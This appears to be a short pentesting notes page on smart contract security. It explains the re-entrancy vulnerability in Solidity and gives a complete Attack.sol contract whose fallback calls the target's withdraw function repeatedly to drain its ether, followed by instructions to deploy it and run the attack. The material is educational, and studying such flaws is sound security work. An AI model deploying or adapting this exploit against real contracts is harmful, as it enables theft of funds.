Pentest Notes
Pentest Notes

Exploits related to Blockchain

Others

Blockchain Pentesting
Compile, Deploy, Run Smart Contract
Interact with Ethereum using Foundry
Interact with Ethereum using Python
Smart Contract Pentesting

Smart Contract Pentesting

Last modified: 2022-12-01

Blockchain Ethereum Web3

A smart contract is a program or a transaction protocol that is commonly used in decentralized applications.

Tools

  • Remix IDE

    An online tool that allow us to deploy a smart contract and run transactions.


Re-entrancy Attack

It’s a common vulnerability involving withdraw and deposit in Solidity.
For example, create “Attack.sol”.

pragma solidity ^0.8.10;
import './Target.sol';

contract Attack {

     Target public target;
     constructor(address _targetAddress) {
         target = Target(_targetAddress);
     }

     fallback() external payable {
         if (address(target).balance >= 1 ether) {
             target.withdraw();
         }
     }
     function attack() external payable {
         require(msg.value >= 1 ether);
         target.deposit{value: 1 ether}();
         target.withdraw();
     }

     function getBalance() public view returns (uint) {
         return address(this).balance;
     }
}

After compiling, deploy it and run “attack” function to get balances by compromising the target contract.

Twitter GitHub